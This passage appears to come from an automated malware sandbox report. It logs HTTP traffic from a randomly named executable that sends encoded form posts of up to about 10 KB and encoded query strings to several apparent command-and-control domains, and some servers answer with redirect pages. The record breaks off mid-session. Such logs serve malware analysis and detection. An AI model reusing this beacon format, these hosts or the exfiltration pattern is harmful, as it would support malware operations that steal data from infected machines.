                                                                                                                                          Nov 14, 2024 16:29:24.044527054 CET609INData Raw: 46 28 44 8b 1a 96 ca 57 60 de 4e 3f c4 0d b4 45 62 b3 77 78 b0 ac 85 64 b9 96 e7 dd 08 8e 6f 34 fd 03 3a 44 8d 25 07 47 8b 28 be ae 5a b4 90 24 fe 00 9f 4b 41 df 74 69 1e 3a 0a 43 74 72 82 34 89 83 a5 54 cb dc 03 b3 12 0a 55 42 5a d1 54 4f b5 f4
                                                                                                                                          Data Ascii: F(DW`N?Ebwxdo4:D%G(Z$KAti:Ctr4TUBZTOvde"+IH{s^gOfQered5-SryL8`-FlcfQWr`/~}=8E5/f5:`l_AU"7Yh#2`V-W"OT+q=Hq~ka-


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          20192.168.2.450022141.193.213.1180928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:29:25.892909050 CET418OUTGET /zdt7/?n8C0=OdyTsfpKOp+FbfSCrXq4B4jl9EVFsGvs0o0DPQC5l8EmE472eTQ0FDkunmNaJXsoU4tZbjlt6ORfso7icAjApV45c11yxg1NrPYKxfgySb4ZloyON4h3X90=&vva=cTUXfXqHQ4cd-Hh0 HTTP/1.1
                                                                                                                                          Host: www.meanttobebroken.org
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Nov 14, 2024 16:29:26.601289034 CET655INHTTP/1.1 301 Moved Permanently
                                                                                                                                          Date: Thu, 14 Nov 2024 15:29:26 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          x-powered-by: WP Engine
                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                          X-Redirect-By: WordPress
                                                                                                                                          Location: http://meanttobebroken.org/zdt7/?n8C0=OdyTsfpKOp+FbfSCrXq4B4jl9EVFsGvs0o0DPQC5l8EmE472eTQ0FDkunmNaJXsoU4tZbjlt6ORfso7icAjApV45c11yxg1NrPYKxfgySb4ZloyON4h3X90=&vva=cTUXfXqHQ4cd-Hh0
                                                                                                                                          X-Cacheable: non200
                                                                                                                                          Cache-Control: max-age=600, must-revalidate
                                                                                                                                          X-Cache: MISS
                                                                                                                                          X-Cache-Group: iphone
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e28097c3febe528-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          21192.168.2.45002376.223.67.18980928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:29:31.693335056 CET694OUTPOST /t2sm/ HTTP/1.1
                                                                                                                                          Host: www.mjmegartravel.online
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.mjmegartravel.online
                                                                                                                                          Referer: http://www.mjmegartravel.online/t2sm/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 201
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 77 36 67 2b 58 65 6a 6f 42 31 59 79 42 6f 75 56 63 62 57 33 38 32 67 69 72 4f 76 6a 37 30 76 51 45 78 61 44 67 52 2b 65 46 51 57 38 46 6e 65 4f 71 6a 57 4b 71 32 5a 76 55 6c 6f 79 62 4c 6d 56 32 78 30 4d 58 35 41 41 53 64 58 30 59 72 61 68 5a 30 6f 74 52 66 38 7a 47 6a 4e 37 72 35 50 39 7a 39 76 4c 72 41 4c 30 30 32 57 34 30 33 54 57 4e 44 49 4a 6d 52 62 4d 5a 2f 56 44 31 68 38 59 73 38 37 68 36 35 4e 54 46 66 6a 70 78 36 33 30 64 76 6e 43 42 31 62 6c 77 46 63 5a 79 39 7a 6f 34 36 38 54 30 56 73 4c 67 4f 63 56 36 68 46 32 79 7a 45 6a 33 69 4b 6e 45 4c 45 61 47 30 63 64 2b 51 3d 3d
                                                                                                                                          Data Ascii: n8C0=w6g+XejoB1YyBouVcbW382girOvj70vQExaDgR+eFQW8FneOqjWKq2ZvUloybLmV2x0MX5AASdX0YrahZ0otRf8zGjN7r5P9z9vLrAL002W403TWNDIJmRbMZ/VD1h8Ys87h65NTFfjpx630dvnCB1blwFcZy9zo468T0VsLgOcV6hF2yzEj3iKnELEaG0cd+Q==


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          22192.168.2.45002476.223.67.18980928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:29:34.245887041 CET714OUTPOST /t2sm/ HTTP/1.1
                                                                                                                                          Host: www.mjmegartravel.online
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.mjmegartravel.online
                                                                                                                                          Referer: http://www.mjmegartravel.online/t2sm/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 221
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 77 36 67 2b 58 65 6a 6f 42 31 59 79 42 4a 65 56 65 34 2b 33 37 57 67 68 6e 75 76 6a 74 45 76 63 45 78 57 44 67 55 4f 30 46 6c 47 38 46 48 75 4f 72 6d 36 4b 70 32 5a 76 4e 56 6f 33 56 72 6e 5a 32 78 4a 76 58 38 34 41 53 64 7a 30 59 72 4b 68 5a 44 38 69 53 76 38 4c 48 54 4e 35 6b 5a 50 39 7a 39 76 4c 72 44 33 53 30 32 4f 34 31 47 44 57 4e 69 49 49 34 68 62 50 61 2f 56 44 78 68 38 63 73 38 37 44 36 38 74 70 46 5a 6e 70 78 34 76 30 64 2b 6e 42 61 6c 61 75 30 46 64 76 39 76 79 41 77 59 5a 48 71 30 77 79 6d 4e 49 72 32 48 49 73 6a 43 6c 30 6c 69 75 55 5a 4d 4e 75 4c 33 68 55 6c 53 6d 30 47 79 65 32 74 55 51 4d 59 47 36 33 65 30 52 65 30 38 30 3d
                                                                                                                                          Data Ascii: n8C0=w6g+XejoB1YyBJeVe4+37WghnuvjtEvcExWDgUO0FlG8FHuOrm6Kp2ZvNVo3VrnZ2xJvX84ASdz0YrKhZD8iSv8LHTN5kZP9z9vLrD3S02O41GDWNiII4hbPa/VDxh8cs87D68tpFZnpx4v0d+nBalau0Fdv9vyAwYZHq0wymNIr2HIsjCl0liuUZMNuL3hUlSm0Gye2tUQMYG63e0Re080=


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          23192.168.2.45002576.223.67.18980928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:29:36.793102026 CET10796OUTPOST /t2sm/ HTTP/1.1
                                                                                                                                          Host: www.mjmegartravel.online
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.mjmegartravel.online
                                                                                                                                          Referer: http://www.mjmegartravel.online/t2sm/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 10301
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 77 36 67 2b 58 65 6a 6f 42 31 59 79 42 4a 65 56 65 34 2b 33 37 57 67 68 6e 75 76 6a 74 45 76 63 45 78 57 44 67 55 4f 30 46 6c 4f 38 46 32 4f 4f 72 46 43 4b 6d 57 5a 76 46 31 6f 32 56 72 6d 44 32 78 51 6d 58 38 38 32 53 62 33 30 59 4a 79 68 51 57 41 69 46 2f 38 4c 4d 7a 4e 36 72 35 4f 39 7a 39 2f 50 72 41 66 53 30 32 4f 34 31 46 72 57 45 54 49 49 36 68 62 4d 5a 2f 56 50 31 68 38 67 73 38 79 68 36 38 59 55 46 70 48 70 78 59 2f 30 61 4d 50 42 57 6c 61 73 35 6c 64 6e 39 76 2b 66 77 59 46 4c 71 30 55 55 6d 4d 77 72 6e 43 52 78 32 78 41 33 6b 68 65 50 4e 75 56 71 47 6e 5a 6e 73 6a 4f 6d 49 51 71 36 2f 57 67 62 65 52 58 73 4f 6d 4a 44 71 59 49 65 39 6e 44 34 71 66 42 59 66 78 52 56 59 64 41 46 36 7a 4a 32 2f 6d 5a 4b 64 63 41 71 36 6e 46 44 63 74 36 38 2f 51 47 76 74 72 63 71 78 6d 41 6e 4f 57 43 4f 43 2f 78 61 61 74 68 4e 36 4b 37 41 33 76 47 31 61 79 78 4b 50 63 31 53 71 33 30 63 73 36 59 4e 79 4c 6e 33 53 54 58 4c 59 32 32 5a 65 43 67 43 30 54 4f 52 6e 4f 41 47 65 41 6b 64 2b 66 57 37 51 [TRUNCATED]
                                                                                                                                          Data Ascii: n8C0=w6g+XejoB1YyBJeVe4+37WghnuvjtEvcExWDgUO0FlO8F2OOrFCKmWZvF1o2VrmD2xQmX882Sb30YJyhQWAiF/8LMzN6r5O9z9/PrAfS02O41FrWETII6hbMZ/VP1h8gs8yh68YUFpHpxY/0aMPBWlas5ldn9v+fwYFLq0UUmMwrnCRx2xA3khePNuVqGnZnsjOmIQq6/WgbeRXsOmJDqYIe9nD4qfBYfxRVYdAF6zJ2/mZKdcAq6nFDct68/QGvtrcqxmAnOWCOC/xaathN6K7A3vG1ayxKPc1Sq30cs6YNyLn3STXLY22ZeCgC0TORnOAGeAkd+fW7Q2QNgKETe03a4ZNAt5NT+7hQLp1YjCNFC2I7Bcs9/gvXFim8iNI0rABRXCxOoDuSB/GyuwwYKly7pS8vVRQiL57uo7n45lqMowDNnaaFG+zTJJKLWFXEkaZn0K+tI/mWnMM4m3MyR1Gb9+BPq96ZrTctsmj61TMbz3YPls37ERR1bpSdp68j6rs23lpx4pWCrctazQQQSZ9ankmDjjXE5yLPBFNdvAG8j98IfLjO4EFr6V+Qe6qhF5oNxpapAFiZjRy1wczfPgWahIeWpPDcZjcR/sDJ2KpO2oeJyFRqeItVUZ7v+ABanji4Rv4z7Ir/RNy1AK6KW23Bh+xLGlvTbwr6mPFY3cXEP59HNwwSH9+wr9jMY7wMb94/0Zowl7adXdFN2tcahYbHO482wLF6E2gsLHeTLV8AiT177y9Dpx8gwCShgDcWxJXNXCCKcw6ByeYP3QCFurIrreFPObbaPeJ+bH2Lteit8UvFjbkzE8sVKUDClSvQLUxLUBM+2IDRI7DDkW1KKz2YMflM4THgxEwm0oSJ18iZ3d5c9lsE9avJkCBuR9anN7wWHKftKplaLsRIs1Y+v9q3jFHvQ2O0NMQWowTDsALtSlbs2z5j7+5E5DM9kirdw6zOzAhqWrNum8r4sbijS0suFy2z0aZjm+ZXOewxN3+xB4b [TRUNCATED]


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          24192.168.2.45002676.223.67.18980928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:29:39.337078094 CET419OUTGET /t2sm/?vva=cTUXfXqHQ4cd-Hh0&n8C0=94IeUqPLX3ZZBpOCZpi27HAmsI+C+yvCK3bXujG3CQTlZUuHvWSdywBNDw0UN7LA9SFuNcoJQf79ZomCfHkQHI8YLgsovf7r6trIliqKrlGHqlH/IzIJ3iw= HTTP/1.1
                                                                                                                                          Host: www.mjmegartravel.online
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Nov 14, 2024 16:29:39.954632998 CET401INHTTP/1.1 200 OK
                                                                                                                                          Server: openresty
                                                                                                                                          Date: Thu, 14 Nov 2024 15:29:39 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 261
                                                                                                                                          Connection: close
                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 76 76 61 3d 63 54 55 58 66 58 71 48 51 34 63 64 2d 48 68 30 26 6e 38 43 30 3d 39 34 49 65 55 71 50 4c 58 33 5a 5a 42 70 4f 43 5a 70 69 32 37 48 41 6d 73 49 2b 43 2b 79 76 43 4b 33 62 58 75 6a 47 33 43 51 54 6c 5a 55 75 48 76 57 53 64 79 77 42 4e 44 77 30 55 4e 37 4c 41 39 53 46 75 4e 63 6f 4a 51 66 37 39 5a 6f 6d 43 66 48 6b 51 48 49 38 59 4c 67 73 6f 76 66 37 72 36 74 72 49 6c 69 71 4b 72 6c 47 48 71 6c 48 2f 49 7a 49 4a 33 69 77 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?vva=cTUXfXqHQ4cd-Hh0&n8C0=94IeUqPLX3ZZBpOCZpi27HAmsI+C+yvCK3bXujG3CQTlZUuHvWSdywBNDw0UN7LA9SFuNcoJQf79ZomCfHkQHI8YLgsovf7r6trIliqKrlGHqlH/IzIJ3iw="}</script></head></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          25192.168.2.4500273.33.130.19080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:29:45.005258083 CET679OUTPOST /24sh/ HTTP/1.1
                                                                                                                                          Host: www.energyparks.net
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.energyparks.net
                                                                                                                                          Referer: http://www.energyparks.net/24sh/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 201
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 42 36 64 30 58 7a 51 79 55 42 71 33 52 37 56 50 42 7a 2b 31 55 32 2b 50 51 2b 31 76 78 53 54 2f 67 67 62 39 49 2f 49 2f 59 46 76 6b 51 33 70 6f 2b 75 48 6d 62 48 6a 37 4c 30 37 6c 67 36 73 4c 2f 6c 63 47 59 2b 49 53 6a 39 64 47 4b 56 71 4e 71 69 32 68 68 7a 6c 55 32 42 44 65 4c 31 30 45 51 2b 41 54 59 41 61 34 46 42 46 78 52 63 6f 2f 4e 38 65 2b 71 47 41 55 56 30 6c 6a 75 2f 56 66 33 4e 5a 45 56 4d 74 79 4c 2b 71 4c 2f 6a 31 69 68 62 72 67 6f 67 57 65 76 78 6f 2f 71 38 30 59 77 32 6a 55 7a 72 79 2f 71 6e 76 4a 36 65 36 4a 34 6b 54 4a 59 32 36 41 71 42 6a 72 53 44 61 47 64 67 3d 3d
                                                                                                                                          Data Ascii: n8C0=B6d0XzQyUBq3R7VPBz+1U2+PQ+1vxST/ggb9I/I/YFvkQ3po+uHmbHj7L07lg6sL/lcGY+ISj9dGKVqNqi2hhzlU2BDeL10EQ+ATYAa4FBFxRco/N8e+qGAUV0lju/Vf3NZEVMtyL+qL/j1ihbrgogWevxo/q80Yw2jUzry/qnvJ6e6J4kTJY26AqBjrSDaGdg==


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          26192.168.2.4500283.33.130.19080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:29:47.542839050 CET699OUTPOST /24sh/ HTTP/1.1
                                                                                                                                          Host: www.energyparks.net
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.energyparks.net
                                                                                                                                          Referer: http://www.energyparks.net/24sh/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 221
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 42 36 64 30 58 7a 51 79 55 42 71 33 51 62 6c 50 44 51 57 31 64 32 2b 4f 63 65 31 76 6f 43 54 37 67 67 58 39 49 2b 4d 56 59 33 4c 6b 51 58 5a 6f 2f 72 72 6d 53 58 6a 37 45 55 37 67 75 61 74 48 2f 6c 5a 37 59 37 49 53 6a 38 35 47 4b 55 61 4e 71 52 65 69 37 44 6c 57 37 68 44 63 46 56 30 45 51 2b 41 54 59 41 66 76 46 42 4e 78 52 4a 34 2f 4e 5a 79 35 30 57 41 56 53 30 6c 6a 71 2f 56 44 33 4e 5a 32 56 4f 49 64 4c 38 69 4c 2f 6e 6c 69 68 4f 66 76 6e 67 57 59 68 52 70 58 76 39 70 69 2f 55 76 56 36 71 2b 71 30 6b 72 44 79 34 33 54 70 56 79 65 4b 32 65 7a 33 47 71 66 66 41 6e 50 47 76 6d 50 52 70 63 73 5a 77 56 49 4d 51 79 39 66 7a 62 78 4c 7a 6f 3d
                                                                                                                                          Data Ascii: n8C0=B6d0XzQyUBq3QblPDQW1d2+Oce1voCT7ggX9I+MVY3LkQXZo/rrmSXj7EU7guatH/lZ7Y7ISj85GKUaNqRei7DlW7hDcFV0EQ+ATYAfvFBNxRJ4/NZy50WAVS0ljq/VD3NZ2VOIdL8iL/nlihOfvngWYhRpXv9pi/UvV6q+q0krDy43TpVyeK2ez3GqffAnPGvmPRpcsZwVIMQy9fzbxLzo=


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          27192.168.2.4500293.33.130.19080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:29:50.090987921 CET10781OUTPOST /24sh/ HTTP/1.1
                                                                                                                                          Host: www.energyparks.net
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.energyparks.net
                                                                                                                                          Referer: http://www.energyparks.net/24sh/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 10301
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 42 36 64 30 58 7a 51 79 55 42 71 33 51 62 6c 50 44 51 57 31 64 32 2b 4f 63 65 31 76 6f 43 54 37 67 67 58 39 49 2b 4d 56 59 33 44 6b 51 6d 35 6f 35 4d 2f 6d 41 48 6a 37 4a 30 37 68 75 61 74 4b 2f 68 4e 2f 59 37 30 6b 6a 2b 78 47 59 6d 53 4e 73 67 65 69 31 7a 6c 57 79 42 44 66 4c 31 30 56 51 2b 51 58 59 41 50 76 46 42 4e 78 52 4f 41 2f 5a 63 65 35 32 57 41 55 56 30 6b 33 75 2f 56 2f 33 4e 42 63 56 4f 64 69 4c 4d 43 4c 2b 48 31 69 6a 38 48 76 71 67 57 61 69 52 70 50 76 39 6c 48 2f 55 43 73 36 72 36 41 30 6a 6a 44 32 5a 65 74 36 52 79 31 4a 58 4b 6f 76 45 71 59 59 33 66 49 50 66 2b 50 52 74 73 49 4d 79 38 69 42 53 66 7a 62 54 71 7a 64 54 42 53 6e 71 72 53 61 56 6b 4e 51 36 49 53 30 59 79 34 41 53 73 64 4e 63 58 49 73 43 75 4b 6f 69 69 61 70 41 38 33 4e 6e 38 45 4f 78 6a 56 59 78 76 68 38 59 51 48 41 42 62 61 41 54 51 47 78 71 5a 41 62 79 39 64 62 5a 43 51 57 4b 74 31 44 71 6f 6c 6f 59 30 59 4c 78 4d 70 63 68 51 31 39 47 53 5a 6a 32 72 64 61 74 67 78 37 6d 50 6e 6e 37 38 6d 70 54 51 6b 44 [TRUNCATED]
                                                                                                                                          Data Ascii: n8C0=B6d0XzQyUBq3QblPDQW1d2+Oce1voCT7ggX9I+MVY3DkQm5o5M/mAHj7J07huatK/hN/Y70kj+xGYmSNsgei1zlWyBDfL10VQ+QXYAPvFBNxROA/Zce52WAUV0k3u/V/3NBcVOdiLMCL+H1ij8HvqgWaiRpPv9lH/UCs6r6A0jjD2Zet6Ry1JXKovEqYY3fIPf+PRtsIMy8iBSfzbTqzdTBSnqrSaVkNQ6IS0Yy4ASsdNcXIsCuKoiiapA83Nn8EOxjVYxvh8YQHABbaATQGxqZAby9dbZCQWKt1DqoloY0YLxMpchQ19GSZj2rdatgx7mPnn78mpTQkDJrgMp/uQYkHWhTd7nh0D3jjYXW2Ou3tPJVRIzc1HxoWFBFmhWCoDrymmBdH5QMrqStV4mfXCLJugirhGi0+CixG/kg7AGCxK1EUXk+Qcac/6hz0QNpb3pLpi3UiVU+i9KuwJpGGsDiUFYqMIlH/zzUOPkVeZKu/3Pqtz32v5Bp8nRg/U+dQ8C0paA1wXovhKvJUVNKhBhgUN7mDq5bMu1PL2NI5pVhM79MMMoxDd5d5FYENzPPo8k14KZr8hBtuZ1uOWQLwvI3wdokoDAj7ljxvmqgSHyrQZv5ZwaMlPXAyAjj/VbMVvL8XvVYLQGmoSBkmCUfOo4ugUDvcZDCND+zXPq+TwJSM/DI3EoenJBOl/sPPGHJIGIJYlLszZXkdtBdFLl0KMsycI83/WA3JJRZONYJvDWTimuF0etAk24YB0O0toYPImuoJgbk51Nfvz0qRWPpOW0l4bNknQ3IqUf9Y5/ETpsj+K5h4PWZ1HGZDGXaA88VOW+cWEblX3ZieIAn28TUzpyzsNlBdJtlNmB6qkUxdYcQfY5uxe1tlfpSrVubPpwH3arv+TlXYYw1Vp1XN4i+HRncXl8u2gSvS7OmHZepREEuylK8dg6aEwDJCuPMGppEeSdptOm1EyeVlZ4j5IgYO6bY3HnXxUeyxE/vhMW8zgpNabuR [TRUNCATED]


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          28192.168.2.4500303.33.130.19080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:29:52.635041952 CET414OUTGET /24sh/?n8C0=M41UUGwRPTDcYYp4CDyQdWj1cPQbgBu2hnX9QOYTWHvuC0V13uvlBW/8MUrXzawQyQAEaeslrtJdAUXUhjCR3SUR9gGKPzciSeMUMSO5HA9VQ9I5Ku3b7ko=&vva=cTUXfXqHQ4cd-Hh0 HTTP/1.1
                                                                                                                                          Host: www.energyparks.net
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Nov 14, 2024 16:29:54.200273991 CET401INHTTP/1.1 200 OK
                                                                                                                                          Server: openresty
                                                                                                                                          Date: Thu, 14 Nov 2024 15:29:54 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 261
                                                                                                                                          Connection: close
                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 38 43 30 3d 4d 34 31 55 55 47 77 52 50 54 44 63 59 59 70 34 43 44 79 51 64 57 6a 31 63 50 51 62 67 42 75 32 68 6e 58 39 51 4f 59 54 57 48 76 75 43 30 56 31 33 75 76 6c 42 57 2f 38 4d 55 72 58 7a 61 77 51 79 51 41 45 61 65 73 6c 72 74 4a 64 41 55 58 55 68 6a 43 52 33 53 55 52 39 67 47 4b 50 7a 63 69 53 65 4d 55 4d 53 4f 35 48 41 39 56 51 39 49 35 4b 75 33 62 37 6b 6f 3d 26 76 76 61 3d 63 54 55 58 66 58 71 48 51 34 63 64 2d 48 68 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?n8C0=M41UUGwRPTDcYYp4CDyQdWj1cPQbgBu2hnX9QOYTWHvuC0V13uvlBW/8MUrXzawQyQAEaeslrtJdAUXUhjCR3SUR9gGKPzciSeMUMSO5HA9VQ9I5Ku3b7ko=&vva=cTUXfXqHQ4cd-Hh0"}</script></head></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          29192.168.2.450031172.67.177.22080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:29:59.253113985 CET685OUTPOST /df5c/ HTTP/1.1
                                                                                                                                          Host: www.theawareness.shop
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.theawareness.shop
                                                                                                                                          Referer: http://www.theawareness.shop/df5c/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 201
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
